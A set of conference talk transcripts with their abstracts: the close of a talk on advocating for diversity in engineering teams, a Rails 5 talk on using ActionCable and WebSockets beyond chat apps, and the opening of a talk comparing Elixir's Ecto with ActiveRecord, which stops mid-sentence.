department came over, and it was right next to my desk, and they started doing pull-ups, and then they, you know, based on where their bodies were positioned, they made a joke that I took as offensive towards gay people. And I'm out at work, you know, it's not a secret, and I know that they know better than to say those kinds of things at work. But it could be, you know, it's, it could be hard to speak up and say that that was not an okay joke to say. So the technique I use is, you know, 20 minutes ago when you were at the pull-up bar, I overheard a joke about gay people that made me feel really embarrassed for you and didn't make me feel good about working here. Do you mind not saying those kinds of jokes at work? So that's two sentences, and when I did that first sentence was talk about a specific situation. I didn't call them out as homophobic. I said, 20 minutes ago, at the pull-up bar, a specific situation, the behavior I witnessed was you told a joke, and here's what the joke was, and the impact on it, the impact it had on me. And that has a way of defusing the situation, so I didn't call them homophobic, it's not defensive, they can't really argue with the facts. Especially they can't really argue with how it made me feel. And I provided them what I wanted them to do, which was stop telling those kinds of jokes at work. This tool, I encourage you to read more about it. If you're interested, it's from the Center for Creative Leadership. They have a little booklet on it that you can practice, and it's a great tool for giving general purpose feedback that might be hard to give. And finally, recruiting and retaining the best employees. This was from a few months ago, the front page, top article of the Boston Globe, shortage of tech workers worries mass companies. How many of you have trouble hiring people? Yeah. Right? There's a lot of jobs, a lot of qualified people out there. There's a culture of switching jobs often, so you want to attract and retain the best talent. And I mentioned earlier how some women aren't just leaving your company sometimes when they hear these jokes, or they feel that they're not really welcome. They're leaving the entire industry, and that's a shame. I want to do everything I can to attract the best talent to come work at localitics. You know, and I hear some, sometimes people talk about, Tony, we obviously want more women, we want more people of color to work here, but we don't want to lower the bar. How many people have heard that before? This notion that there's a bar, that you don't want to lower for other people. Etsy, actually, there's this fantastic metaphor that they have for this, where they say people are like potatoes. We all have areas of us that are more well rounded than other areas, maybe some technologies where we have a divot like the eye of the potato. We have this shape about us, right? It's not about a line. We're not throwing that potato over a bar. We're hiring the entire potato, the entire person. And so I would much rather take a candidate, offer them a position, a candidate who maybe didn't do as well on our coding test or as well in our whiteboard test, but has a proven track record of leading teams through quick iteration and being a visionary leader on their team. That person to me is much more valuable than a so-called rock star, a superstar, who is used to only working by themselves. A funny thing happens when you start talking about diversity at work. You get emails like this two months ago from a female co-worker of mine. Below is the perfect example of patronization in the workplace. This is from a male co-worker of hers who had given her a to-do list about a job that she had already been doing for many, many months. Somebody who felt like she wasn't doing according to him what she should be. And she said, you know, how patronizing is that to get a to-do list of what you should do every day? And so this was an opportunity, we talked in person about this too. This was an opportunity for me to go teach her about the SBI tool and say, well, here's my technique. Whenever I get an email like this, here's how I approach it, and here's maybe, here's a tool set, some things you can do and try with this person. But it's difficult. I get people a few times a month, send me emails like this or pull me aside and say, this just happened. What can I do about it? And sometimes all people want is a sympathetic ear, somebody to listen to and talk to about it. Do you have a question? Yeah. Absolutely. Yeah, there's about 10 minutes at the end for questions. If I can just finish, is that okay? And then we can talk about that. Sounds good. And finally, you can work with your HR departments to provide inclusive healthcare, trans-inclusive healthcare, generous OBGYN, and paternity and maternity leave. And by the way, these things aren't just for the people that they directly affect, right? It's not just for women who are currently having a baby. It's also a signal to people that it's okay to have a work-life balance here at Localytics or My Company, right? It's okay to want to have a family. We want you here. And we're signaling that by giving you as much time as you need after you have a kid, right, to bond with them. So we've talked about five ways today, measure, fund, raise, call out, and recruit to advocate for diversity. And I want to leave you with a few thoughts that a lot of people think about diversity efforts like this. Like, it's a binary thing. Either I'm fantastic at it, I'm on, or I'm not good at it, so I shouldn't even try. I'm off, right? We're engineers. This is a way a lot of us think, myself included, sometimes about things that if I'm not, if I can't be the best at it, I'm not going to try. But I want to encourage you to use some of the tactics we talked today to think more about your diversity journey like this. That over time, you'll have low points and you'll have high points. Maybe a low point is you didn't call out speech that was derogatory. Or you said a joke yourself. You slipped up and you said something you probably shouldn't have. The next day, maybe you talk through it with your team and you apologize. Or the next time you hear that speech or that behavior in a meeting, you call it out. But over time, you're getting better at it, right? I love Noda Grass-Tyson. He has this quote, I love being wrong because that means in that instant I learned something new that day. And I have this in my head every time I try to talk about diversity at work. What we've really talked about today is an agile or iterative approach to being an ally for diversity. Okay, back to the airplane real quick. I did get on the flight. I was not kicked off, thank goodness. And in that great equalizer of American society, both Senator Santorum and I and my husband were all three seated in a coach together. Luckily not in the same row or near each other. But we land in Omaha, Nebraska legally unmarried. We left Boston married, legally unmarried in Omaha, Nebraska. And it's something that's on our mind. If here I went to the hospital, would we have as many rights as we do in Boston? No, we wouldn't. And you can't make this up. That very same weekend was the weekend that the Supreme Court handed down the ruling that legalized our marriage in Omaha. We left Omaha that weekend married again. It was a great feeling, right? I'm a full citizen. I finally felt like a full American for the first time in my life. Things can change. We can change our cultures. All it takes is people like you and me to try. Thank you. So the question was in this case, the to-do list coming off as patronizing, how did I work with the individual in this scenario? Both individuals? Yeah. Yeah, I mean, like everything in life, this is a super complicated example because the person in question was senior to me even. And I don't look at this like I need to go solve it. It's not my, sorry, that it's not, I don't look at this like it's my problem to solve necessarily because that's also a way of patronizing. Like, oh, you can't solve it yourself. I'm the man. I'll step in and solve it for you. I'm sensitive to that. I don't want to have that come across that way. So this particular employee and I had a conversation about that SBI tool and practiced it with her. It's one of those things that you can help somebody practice on you as an ally, somebody who won't judge them for wanting to feel this way. And honestly, I think it helped her to hear from somebody, you know, I'm a manager at work. I deal with some of these issues sometimes. It helped to hear from her that her feelings were valid and yes, I do think that this was a case where that he had some, he could have worked on how he communicated to her. My approach for her was not to do a reply email to go talk to the person and, you know, face to face because a lot's lost in that translation. Yes. So the question was, let me show you I heard you correctly, the question was have I kept measurement on which one of these techniques works best. Was that the whole question? Okay. I haven't. But one of the ways we started to measure this is we use a recruiting tool called Greenhouse. It keeps track of resumes coming in and helps us facilitate our hiring process. It was a point of pride of mine when I didn't have to say anything, when people assumed that we would keep track of the number of women candidates and people of color that we talked to and asked the candidates to self-identify. It could be tricky. You don't want to get into this game of guessing. But even that was a, when somebody interviews with you and you say, hey, you know, we have this optional thing where you can self-identify, it's important to us because we want to make sure, because diversity is important to our company. It's a way to open the conversation about, about diversity being important. That make sense? I will be out in the hallway. Please come talk to me. I'd love to hear from you. Thank you, everyone. Thank you.
|
This is a talk for anyone who wants a more diverse engineering culture at work. If you've ever been frustrated by the sameness of your engineering peers, you'll hear practical advice you can use immediately. Creating a diverse team is more than a moral issue - it makes business sense. Diverse engineering teams recruit the best talent, are more innovative, better reflect the needs of their users and make for incredibly fun places to work.
|
10.5446/31495 (DOI)
|
Welcome to the What is New in Rails 5 track. I'm extremely proud to be part of it. I'm excited for all other talks today. I think this is a really cool release. So let's dive into cable boxes. So this was the first cable box I ever saw. And look, it's got a cable. I don't know if any of you are old enough to have seen one of these things. But like this would sit and connect to your TV and you'd be like, okay, to get to 33, I find that and I've got to do the dial. But that's not the cable we're talking about. So for this presentation, I made several high quality 8-bit art, not 2-bit, not 4-bit. But diagrams throughout this presentation, you're welcome in advance. Here we see our intrepid user connecting to Rails through a cloud. Yeah. So again, you're welcome. I'm pretty good. So how can Action Cable sort of change this up? So what we're going to do is we're going to talk about the history of Action Cable and WebSockets. We're going to talk about what it is, what it's not. We'll talk about building blocks, like what actually, what code is there for you to use, and then some patterns. We'll also talk about deployment strategies, how to actually make use of this today. My name is Jesse Walgomont. You can, I'm J-WO on Twitter in the GitHub. If you've got questions, comments on this talk, I don't think we're going to have time for Q&A. So tweet at me and I'll do my best to get you an answer. So I found that the best way to look forward at changes that we're going to take place is to look back and to see where we stand in this march of time. So let's start at our F5 refresh or our command R. So in general, this is how we would update a page for a lot of times. So checking your email was frustrating. You had to click refresh. And then you had to make sure that your two meg of storage didn't get taken up by someone sending you a 300 by 300 JPEG. And then you had to call because texting wasn't really a thing yet. You had to call your friend and be like, check your email. It is full. Kids today with your gigs upon gigs upon gigs of storage just don't understand. So other than that, if you're going to get a page to update itself, maybe you could just have it like auto refresh. So you could have like a meta tag that would say, hey, refresh yourself every three to ten seconds. Dredge report sort of did this for a long time. I think still does. And since sites were being paid by the ad impressions, like this is a pretty good story. You just leave your site up and it would just refresh, refresh, refresh. I don't know why that model didn't work. But this would be the code that would make that work. So by the time that like 2002, 2003 came along, we wanted better. And so we got polling. Polling would be in that time like Gmail, right? Like Gmail came out and did it say you've got two new messages. It didn't update the page. And at the time that's like what? Okay now this is in 2002. Or 2012, excuse me. But DHH said campfire to this day still uses a three second poll. Chat was supposed to be the poster boy for WebSock and Supremes. Now that's 2012. Times have changed. I'm glad that we can move on. But this was DHH's view. He said polling remains a great way to make your app dynamic. If you don't require sub-second responses, live updates in Basecamp are polling. So like this works on a very large set of websites where you can just have it like every three seconds fetch my new stuff. So there are apps that don't need like sub-second responses. Having your JS poll for changes on an interval is like an extremely good idea in many circumstances. So this can be what that looks like. You know, you jQuery pops up. You say set an interval. Make an Ajax recall every three seconds. And sort of set it and forget it. But then we get to WebSockets, which are so hot right now. So I first saw like WebSockets be used with Push or App. They're here. And it made everything very easy. Like they took care of everything for you. So like you'd process an image in the background and then post to Pushers API when you're done. And you're front-end listen to Pusher and like updated when it was done. So this came about as far as I can tell by RFC 6455 in 2011. It says basically it's two-way communication between the client and the server. And that the remote host has to opt into the communication that it can't just, whereas HTTP calls just go and are taken, right? But the client has to request a WebSocket. The server has to say yes. So some examples. Socket.io made things pretty simple in Node-Land to push updates from the server out to the client. Patrick McKenzie, patio 11, built a pretty sweet fake stock market. I don't know if you've played with this or not, but it is pretty sweet. So it sends trades out via WebSockets. Or you can constantly ask via an API call, like which, like, do you have any new trades that have been made? But the thing is, is like you'd have to do that on a loop. Is there any trades? You're making a new connection every time. And when you're trying to do high-frequency trading, which is what sort of it's all about, you want to get at the trade as soon as it possibly can. And so connecting via WebSockets was a way that you can actually get it almost as it happens rather than making a call in an infinite loop. So the trouble is, how can a server keep track of all these connections? Like scaling up in a big server can sort of work in a language like Elixir and others like it. But what about our dear friend Ruby? If every connection, like, lives, and there's got to be an object that's like listening for connections from server to client to server, like, that has to be taken up in memory. And Ruby loves its memory. So you're probably like, I'm uncertain about 2,000 connections, let alone 2 million connections. So with Ruby and with Rails, there's got to be a story about scaling out, not just scaling up. And in spoiler alert, there is. So is the future just real time? Probably not. I doubt that, like, we're going to default to building every feature with ActionCable. But I think it can add sort of pizzazz and fun and really fast updates. Like for certain apps that require that low latency, website cuts is how I would describe treat yourself good. My philosophy. So let's take a look at what ActionCable is and what's not. So if we know where the possible awards are, but we also know where the awesome is, we can decide if it fits in our tool belt. So first, let's start with the what it's not. In general, it's not just a silver bullet that will make everything like super fantastic great awesome sauce. So let's talk about, like, what it's not. So it's very much made to work inside of Rails. I could see a future where it's lifted out, but for one way I see we're not there yet. I don't consider this a bad thing, but it does sort of want to be in a request or it wants to connect with a controller. It wants to be in Rails. That's fine. People are going to NPM install ActionCable. It's also not necessarily a step forward for Rails into more JavaScript integration. Like there is JavaScript here, but, like, it's, I saw this and I was like, I think this makes sense. It's not, it is just a feature. It's the next JBuilder. It's the next Turbolinks. It's not the next Asset Pipeline. It's not the next ActiveRecord. It's just a feature. So let's talk about what it is. So it's a solid feature. Like it works, it's fun, it adds value to your app. I don't think it needs to be any more than this, but, like, this is sort of the scope. It's a nice feature to have for Rails apps. So like Turbolinks and JavaScript responses, it's a way to, like, snap the Fire Rails. It's a way to make it faster. Like there is a certain wow factor where you've got, like, two windows up. You make a change on one. It, like, propagates to the other. Like people are, so, like, wow, that's cool. It's also easy and fun, which, like, big props on that. So why no chat apps? Like why did I specifically come here and say, we're not going to talk about chat apps? So when I came up with the idea for this talk, I was somewhat dread, like, I was dreading the talk that I might hear if I attended. I think it'd be about chatting between users, maybe like an intercom.io style integration, but there's so much more that we can do with sockets. Because chat apps are the hello world of Web sockets. They don't add to, like, they don't add anything. Like there are features where, like, if it's a chat app, you probably want a chat app. But just adding chat to an app doesn't make it awesome. Okay, and so as we show people, hey, you can use ActionCable. Here's a chat app. It's sort of like, but that's not where the real value proposition is. Because most apps don't need chat between two different users. Like Facebook, Chir, another social network, maybe? But, like, I implore you, when you go and you try this out, don't just add chat to your existing apps as a way to check out ActionCable. But some apps do need communication between the server and the client. Like, if we're building unsocial apps, there's big wins on what ActionCable can get us. Use case number one, as I see it, is collaboration. So this can be as complete as a big Trello style where we're both editing the same document or the same card or somebody adds a card and it shows up on my page. Or maybe a price changes on a website, inventory changes, stuff like that. It'd be nice if I'm viewing everything if it did update, rather than later on on another page load. Use case number two, asynchronous tasks. So if you're implementing a task that the server needed to do, say, like fetch all new data from a third party or something. Maybe it's something like create a PDF from an invoice. You'd likely throw it on an action job and pull for when that's complete. It's not easy. It's not rocket science either, but it's doable. But ActionCable can make that fun. Okay. So the first ActionCable beta. So again, more with the history. And then we'll get to code, I promise. Okay, so last year, ActionCable was announced as vaporware. It was announced with a diagram, but no code. This is the diagram. Now not too much later, July of 2015, we got our first look at the code. That's only a couple months. So like as far as vaporware existence, that's not all that long. But it was a non-rails experience. Now it was only version 0.0, but like trying it out was a little bit rough. So there are no generators, no deployment story, no standalone, no in-app version. And again, like this is version 0, and here I am complaining about it. I was able to get it to work, but it was a pain, like sort of like diving into the source code pain to try and figure stuff out. And that's not necessarily the rails way. So I'm glad it existed. And I bring this up to say that if you tried it then and didn't like it, now is a much better experience. The core is still there, but it's got the nice sugar, too. So the current beta version, 5.0, 0.0, beta 3, which syncs across rails versions was released in February 2016. And I was sort of like this. True story. So it made all the things that I had like enumerated about for this talk, like do this, don't do this. You want unauthenticated users, you have to monkey patch this, and it made them all just go away. It was great, and I was happy. So finally some code. Let's talk about building blocks. So the modules. So what makes action cable action cable? There are four distinct modules. So the first is the cable. So this is the actual connection from client to server. So it's what is connected to. So it's a, like it lives on, messages go back and forth without having to reconnect. So then you've got a channel. All right, so you've got your cable, that's the actual connection. Then you've got a channel. The channel is the thing, is sort of a room. It's what you listen for events. So a channel is on the rail side, and it has a stream name that can be like all products, or it can be scoped down to a specific user, like cart underscore, like that user's ID. Broadcasting is sending information out from rails through the channel to the client. And then you have a subscription. Subscriptions on the client side. Generally this is just JavaScript. It doesn't have to be, but an action cable, it's JavaScript. And it's the client side. You listen and you receive data from the server. Let's dive into each of these. So the cable, the actual connection. My examples in these are going to be in JavaScript, not CoffeeScript. So you can easily make these go to coffee at, like, JS.coffee, but these are going to be JavaScript. So what we do here is we require the action cable library, all the channels, and then we create, like, a big app object. If it doesn't exist. And then we slide the cable onto the app global object. So in general, like, this is what exists, app.cable on your JavaScript side. On the rail side, we tell it to process sockets in process. So this is async at slash cable. This is sort of the easy way to do it. The slash cables, configurable, but this is sort of assumed to be the convention that you'll use. That's the actual connection between the two. So let's look at channels. On the rail side, a channel is like a controller. So it groups sort of ideas together. So you might have a products controller, maybe an inbox, a stream that's, like, specific to that user of updates. Think about this as, like, on Facebook, maybe you've got a stream on the right for, like, all your updates of what people do, and then maybe you've got a stream in the middle for your news feed. So they group together. So each channel has a connection, and it inherits from application connection. So this is very much controller inherits from application controller. So here's where you would tell that this connection that you have a current user object. So identified by current user enables you to use this later on. It enables you to be able to say that your channel is only for a specific user. And on line seven here, we see what happens when the channel is connected to. So when the channel is connected, we find the user, so user.findby, ID of cookies.signed, user ID. So we'll come back to this in a little bit, but notice that it's cookies.signed, not session ID. So you don't have a session, but you do have cookies. But since you have cookies, this could be in application controller if you're using, like, a password, what you might do here. So you would say, on line nine, cookies.signed, user ID is the user.id, and then on line five, user findbyid's cookie.signed. So you would switch from a session of user ID to cookies.signed of user ID. I have a device example later for, like, the 90% of you who are wondering how to do this with device. So just hold on. Let's talk about broadcasting. So here I am using an action job to broadcast out the message to a JavaScript channel. That'll send it up to the client. So line six shows how to send it out. So action cable.server.broadcast. And then you give it a stream name and a hash. So that hash would be the data that's going to be sent up. That hash, you'll send it out as a hash. It'll be received later in JavaScript as just a JavaScript object. So this can be done anywhere, rate tasks, action jobs, controllers, model callbacks, like anywhere in Rails has the ability to send out broadcasts, which is cool. Also here I am doing the action controller.render, which is super awesome. I think we're going to look back and see this as a very cool feature. We'll go into that a little bit later. Finally, you've got a subscription. That's the JavaScript listener. So when you create a subscription, it listens for all broadcasts for that channel. So when the server broadcasts a message, it calls the received function, and that's where you get your data. So app.product is equal to app.cable.subscriptions.create. And then you've got connected if you wanted to log that, disconnected if you wanted to log that, and then received. Received is sort of magic function, like that's what you need to call it. That's when I broadcast from Rails up to JavaScript, that's what it calls. And then you can do whatever you want with that data. So here it's like data.product.id, but you can do whatever you needed to with this. Here I'm saying let's find a product with the data.product.id of that ID and replace it with a template. So in this example, Rails is sending up the updated template for that product, and it's just going to re-render right on top of it. So let's walk through a standard action-cable interaction. We'll start on the client side this time. So by requiring action-cable, the cable cables to the Rails cable. The browser then upgrades the cable connection to a WebSockets connection. In the subscription, subscribed, connection connects. And then to start listening for updates, you create a subscription with the received function. That's what gets called. So you can have many subscriptions in like many different places. So what I mean by that is like app.channel, or app.cable.channel is this global thing. So anywhere in JavaScript, you can access it. So it could be your standard jQuery style, like listen for the event, or it could be in React, like on the component in mount. It could be in Angular. It could be in Ember, on the set of controller. Like any of these things can create a subscription and start using it. So the subscription calls receive data when the subscription receives the data. And that's it. This is a Tron DeLorean. I love Giffy. So let's talk about patterns, like how we might set up for specific scenarios. First, we'll talk about data updates. So this is what it basically called collaboration. But we can keep data in sync across tabs and users. Sorry, not sorry. So here we're looking at a pretty sweet browser setup. It's got four tabs. Up in the top right is the cart button. That's a cart. And we're selling tennis balls. So those are tennis balls. So that's your add to cart button. I'm telling you, I'm pretty good. But we're looking at four tabs because the middle two are on this site. I don't know about you, but I'll go to Amazon and I'll do a search and it'll be like open a new tab, open a new tab, open a new tab, open a new tab. So I've got all of these open that I can flip through. So if we add the cart on tab three, there's now one item in our cart. But what about tab two? It's typically not updated, right? It's typically sort of it was, it'll show whatever was on that page as it loaded, but not update itself, even though tab three updated itself. It's not a huge thing, but what could we do to make this experience even slightly better? So after the update happens, like in a controller or a job, you would broadcast a message. The message can be data or it can be a Rails rendered template partial for you to update with. So this is the application controller.render. So when I heard about application controller.render, I was basically like dancing the dance of joy. So I've wanted this for so long. The use case that I have for it is like creating reports. So each month you'd want to create reports using whenever like a rake task and I'd want to be able to use Wicked PDF to take HTML and convert it to PDF. But it's not in a request cycle. Like there is no request at that point. So I had to do some like weird things, man, to like make that work. But now it's easy. You can just render an entire part, like a partial or a page. You just hand it what locals you think this partial should have. And they can be the same partial that you would use if you're like rendering your cart or rendering out like a list of products. I think it's going to be really awesome. Here's how you could send out new cart partial to a current user only. So you would broadcast to cart underscore current underscore user dot id. So that would be scoped to just that user. It would only go out on channels where that's subscribed, where you are that user. So it's not that like the cable has all of the message. It only has the message that it's actually subscribed to. Here's the channel setup that would set up the stream. So the channel would have subscribed and it would say streamed from cart underscore current user. Both these have been on the rail side. So you've got broadcast to a channel. And then JavaScript listens for that message. So app cable subscriptions create cart underscore the current user ID. He receives the data, replaces up the template. Now Taps, who's happy? We can also sort of hook into existing JavaScript libraries. So maybe like you change a graph, update some options, can action cable be used to send messages to the server? Did something happen on the client? Yes, it can. So if you want to send a message to the server and then out to other clients, here's an example for you. So the example that I've got is like an HTML5 slides presenter mode. So imagine that this is like reveal.js and we're all looking at it. So you'd be looking at sort of like a read-only state, I'd have the ability to change the slides. And so what we would do is you'd add an event listener. So you'd add an event listener to the slide change. Now that's reveal specific. So all of this is predicated on your JavaScript libraries having hooks that you can tie into. But what gets sent from client to server when you say app.slidesnotification.advancedlide and then you send it some data. So the slides notification, that's the channel name. And then you've got a channel method on advanced slide and then you send it the data. So app.slidesnotification.advancedlide. So advanced slide is the method that JavaScript will call to tell Rails that something happened. So here we say app.slidesnotification is the app cable subscriptions. So this is setting up the subscription, the previous slide was using it. And so we say advanced slide. So that's the function that we called when we said app.slidesnotification.advancedlide. This does this.perform slides data. Back on the Rails side, we have a slides channel. So the streams from slides, that slides stream is the name of it. So earlier, one, two, three. So on line six here, we say perform, perform on slides and send it the data. That slides becomes line three here, stream from slides and calls the line six slides method. So that is what comes in from JavaScript back to Rails. So there's the broadcasting out and then the receiving message back. So line six here, slides of data, we're, I'm just going to say, ifcurrentuser.admin, admin, then action cable server broadcast, like broadcast it out again. So what's interesting about this is messages go from client to server. It's not peer to peer. So like this makes sense when we think about it, but if I want to, if we were all on a server, right, and I wanted to send a broadcast message out to all of you, I would not send it directly to you, I would send it to the server and the server would send it to you. And vice versa as you reply back. So let's talk about collaboration. So Trello, we talked about cards, like that's sort of what it would be. Pivotal tracker, also the cards. But then on GitHub, they do a neat thing where it's sort of complete with yes, no, you can merge with, TrevCI comes back. And then it updates all the other users viewing the page. So this is a neat way that if I like click and merge, it's going to other people viewing that page remove the ability to merge. I think that that's the type of thing that we can very easily get huge wins out of with action cable. Finally asynchronous tasks. So let's imagine that we have a system where we use mechanized to go out and fetch the latest data. This can take quite a bit of time so let's throw it in action cable job, or an action job. So the first thing we do is we generate a channel. So each channel is going to have many streams based on like a UUID. So each task that we do would have its own stream. Then the JS posted up, give it the UUID that defines this job. You would then create a subscription on that stream with that UUID for when messages come back from Rails. Maybe you have a site search job that performs search with a UUID. So you have your stream that you broadcast, hey, I'm starting. And then snip, you do all the stuff. Then action cable server broadcast the stream that it's complete and along with the template. And yeah, let's go ahead and discuss chat. I read that there's this concept of iMessage on iPhones lock-in that people really love seeing the bubble like when people are typing. That it makes it feel sort of instant that you're connected to someone, like there's an actual person that's actually typing right now. So, oh, no, come back, come back. So Aziz Ansari talks about this in modern romance. So he asked someone out. He saw the bubble, but then nothing. Like the bubble just went away after a while. He never got a reply in the sad face for Aziz. But there's a sort of emotional thing with this. Okay, so what would you do? So you could listen for the key up event on a text area and then tell the server that you're typing in, that you're typing in the conversation between you and Taylor Swift. Then when the message is sent, you would stop the bubble and render the message text. And maybe you would handle if you haven't typed in a while. End of chat. Let's talk about deployment. So in-app mode is basically easy mode. Think of it like you'd use Sidekick, not inline jobs. So you're not doing Sidekick, it's just inline. It works, but scalability is a thing. So it can be done with only one server, no rescue Sidekick. You can just say that everything is inline, everything is async. So you would tell it, my QAdapter is async, and then my config, cable.yaml, async, async, async. Everything is done async, so that's just threaded. It connects to slash cable on the Rails server. And generally can work pretty well. But if you've got more than one server, like you've got multiple dinos or whatever, then you want to use Redis. So you want to have server, server, Redis, and Redis will keep it in sync. Otherwise, everything is just going to be in memory on each server, and that's no good. Because if I connect to one server, that's a physical connection, you connect to another dino, we have to have some way that I can actually pass messages back and forth. Redis would be that. Standalone is basically hard mode. It's slightly more involved. It's the same scale as sort of moving from async to sidekick. You connect via Redis. You've got to have an actual, like sockets.domain.io. You've got to configure where it is so it knows how to connect more with our person. So our green person connects to Rails. Again, you're welcome. When you broadcast it, it sends the message to Redis. Action cable is listening for that, and then action cable sends it back out. So quick likes and gotchas. So what about miss messages? I don't think we know yet what this story sounds like. But I think we have to think about the idea that if I'm just sending update, update, update, and you miss some messages, you go offline. What does that look like? In a physical, like it's a physical network connection to somewhere in the world. So you want to use ActionJob. Don't inline, like just broadcast it out in your controller because it would have to send like somewhere along the world. Don't wait for that. Also no session, only cookies. So here is your device version. You're welcome. You have to configure your request origins to allow or disallow people to be able to connect to you. Fun fact, don't leave a trailing slash in the host because it will not work. And finally, the config.cable.yaml default setup, this is what gets generated. The production URL for Redis is localhost. You'll need to change that. So where do you go from here? So I've got a simple example that you can look at, J-O-O slash inventory cable. There is also ActionCable examples. These are very good. There's documentation on this URL. But so ActionCable is part of the Rails standard, just like ActionController. Finally, I want to give some many thanks. So thanks to DHH for having the idea, announcing it, making it happen. This is very cool. The 42 plus contributors on the ActionCable project, you all rule also. And thanks to the IronYard for paying for me to come here, spend today with you. So we're hiring developers across the US that want to learn how to teach, make the world better, change lives, improve diversity. So if you're interested, tweet at me, come talk to me. I'm J-O-O. Thank you very much. Thank you.
|
RealTime updates using WebSockets are so-hot-right-now, and Rails 5 introduces ActionCable to let the server talk to the browser. Usually, this is shown as a Chat application -- but very few services actually use chats. Instead, Rails Apps want to be able to update pages with new inventory information, additional products, progress bars, and the rare notification. How can we make this happen in the real world? How can we handle this for unauthenticated users? How can we deploy this?
|
10.5446/31496 (DOI)
|
So my name is Brad Urani. I work at Procore. This is a talk about object relational mappers, ORMs, specifically comparing, contrasting Ecto and Active Record. Ecto is an ORM for Phoenix, which is a web framework for Elixir. So Elixir is pretty a relatively new programming language. It was created by this guy, Jose Valem. He was a long time core member of Rails. He kind of split off and started his own programming language. It's a really neat language. It's very, very, very fast. It's a functional language. It's got kind of a Ruby-esque syntax. It's designed for very, very high concurrency. It does that very, very well. And Elixir actually compiles to Erlang byte code. So Erlang was this language. It's made for massively scalable soft real-time systems for requirements on high availability. Erlang was invented by this guy, Joe Armstrong, way back in the 80s for telephone systems. So this year, he was working at Ericsson at the time. And he wrote software for this telephone switch, which had ran a million lines of Erlang with nine nines of availability. So this is the kind of thing. So if you wanted to, like, design a phone system, for instance, to serve the entire continent of Europe, you used, he figured out how to do that with this incredible technology. It's really sort of amazing. It was invented way back in the 80s, but it kind of fell out of popularity when the internet sort of came around in the 90s. And we didn't need that kind of high concurrency, real-time systems, you know, and Perl and Java kind of became the de facto languages of the internet. Erlang kind of was forgotten about a little bit. But it's sort of made a comeback recently, as people have realized that there are use cases for that kind of stuff on the internet. And what's really, really neat about it is if you have a bunch of servers running Elixir or Erlang, you can run thousands of processes concurrently and they can all communicate with each other. And they can communicate across machines, so these little green boxes symbolize processes, right? So imagine this is telecom technology. So imagine you're routing thousands and thousands of phone calls in real-time and you have this server deployment. They kind of automatically cluster and give you these real-time distributed systems, which is neat. But the thing is, Erlang is sort of like this ugly Ferrari. It's this incredibly fast, neat technology with this like really difficult kind of weird syntax that's not very user-friendly. So along came Jose and he created Elixir, which is basically runs on Erlang, but with like sort of a Ruby-esque kind of syntax that's real nice and pretty. Really, the similarity with Ruby is kind of only skin deep. It's a functional language, so it's really different how you use it. But if you're used to Ruby, Elixir will look kind of familiar to you. So now it's sort of like a pretty Ferrari, right? So these guys sort of combined and now they've got this car that's not only fast but beautiful to look at. And then Phoenix is this MVC framework built with Elixir, a productive web framework that does not compromise speed and maintainability made by this guy, Chris McCord. And it has a lot in common with Rails, so it's MVC, it's got the routes and the generators you're used to, it's got this package manager called Hex, which kind of takes the best of both Gem and Bundler. It's got this thing called Mix, which is like rake. And it has an ORM called Ecto, which is what I'm talking about today, which has similar features set to Active Record, queries and migrations and validations. So a lot of people say Phoenix is like, it's sort of like the next evolution of what Rails should be, you know? We'll see that that metaphor holds partially but not entirely. And it is fast, like I said. So often an order of magnitude faster than Ruby and Rails. DHH says, man, I wish Rails was that fast. He's a race car driver too. To be fair, it's not really Rails that's low, it's more Ruby that's low, so it's not really his fault. But Elixir or Phoenix are very fast. What would you do with that? Like a real-time communication system would be a good example. And what's kind of interesting is if you build, for instance, a mobile app like this, and you've got Elixir with all these processes and this sort of automatic clustering or whatever, when you send a message from one phone to the other, the message goes server to server. And that's kind of built into the Erlang VM. Contrast that with, for instance, Action Cable, which is this new feature in Rails 5. What happens is the server first gets written to Redis, which has this PubSub, which goes so called server to Redis and back to server again. That's not what happens in Elixir. It's the server's cluster and the real-time messages go between the servers. So it's fundamentally different model, a fundamentally faster model. But why stop at simple text messages, right? So using this kind of technology, you could build, for instance, a video chat system, like a video conferencing system. You could do an MMORPG real easy for real-time data. The one I have pictured there, that's League of Legends, which is or maybe was the most popular game in the world. It predates Elixir. They're back in systems are actually written in Erlang. And you can do this real easy because remember, this is an NVC web framework built on top of Telcom technology. So it's like Rails with this more powerful subsystem. But actually, that kind of stuff isn't really what I'm talking about today. I'm talking about ORMs. I really don't have much experience building those real-time systems. So I'm talking about a different part of Phoenix, the design of the object relational mapper, and comparing and contrasting that to Active Record. This is my own personal journey of ORMs throughout the years. These are the ones that I've developed against. These are a lot of Java and C-sharp ORMs. I landed on Active Record relatively recently, and Ecto even sooner than that. And actually really looking at this list, the one that stands out is sort of like the one that's different to kind of adduct. It's really kind of Active Record. It has a pretty unique design. But before I get to ORMs, I need to talk really quickly about functional programming. As I said, Elixir is a functional language. I describe it as a style of program that avoids state and mutable data. I realize that it's not. That doesn't mean like a whole lot, right? And I don't have time to get into a full description of exactly what functional programming is. But if you're coming from Ruby, probably the things that will surprise you most are that Elixir has no objects, right? So like Ruby has modules and classes. Elixir only has modules, which also means there are no methods, right? It has functions that you can call. But it doesn't have that like sort of like methods and objects like in methods and data like in the same class, that encapsulation. It's not object-oriented. It's functional. And no mutations. So that means like in Ruby, you can have like a hash and you can change one of the values. You can't do that in Elixir. If you have like a kind of a hash, it would be a struct. But if you have a struct and you kind of change one, you change a value, you get back a new struct every time you do that operation. And if you have a reference of the old one, it's still there. It uses a mutable persistent data structures. So it's fundamentally different under the hood the way it works, which means you have to write it in a different way, even though the syntax is similar. But let me jump first into Active Record before I get to Ecto. This is all going to be sort of the, you've probably all seen this before if you've used Active Record. So it's a bit rehashing, but I think it's important to sort of start at the basics here just so that when we get to Ecto, it's a conversation not just about how and how you do things different, but why. Like what is the philosophy behind these designs? How do the like top level architectural designs of Active Record and Ecto differ really? So I made a little demo app. It's called Hallway Track. As you can see, in addition to being an engineer, I'm also a graphic designer. But the joke is that, so you go to a conference, right, and they have multiple tracks, like they may have the database track, the front end track, the Ruby track. The Hallway Track is kind of a joke. That's like the people you meet in the halls. So like, hey, what's your favorite part of the conference? Oh, it's the Hallway Track. So this little app is like, so people can like sort of self organize in the hallways and get together with like what they're interested in. So you set up like a little meeting and it shows like here are the people who are going to the Phoenix Fanatic one. It's meeting in the lunchroom at three o'clock there. So what we've got here is we've got a conference, right, which is RailsConf, which has a party, which is like Phoenix Fanatics, which has users. So my database looks like this. Conference has many parties, which has many users. So like, we start up setting up active records. So here's our party class. We have a scope for conference. We've got a scope for starting after. We've got a scope for ending after. So each of those are like little reusable bits of queries, right? That's kind of what a scope is. It's kind of a reusable bit of a query. So then I might combine those together 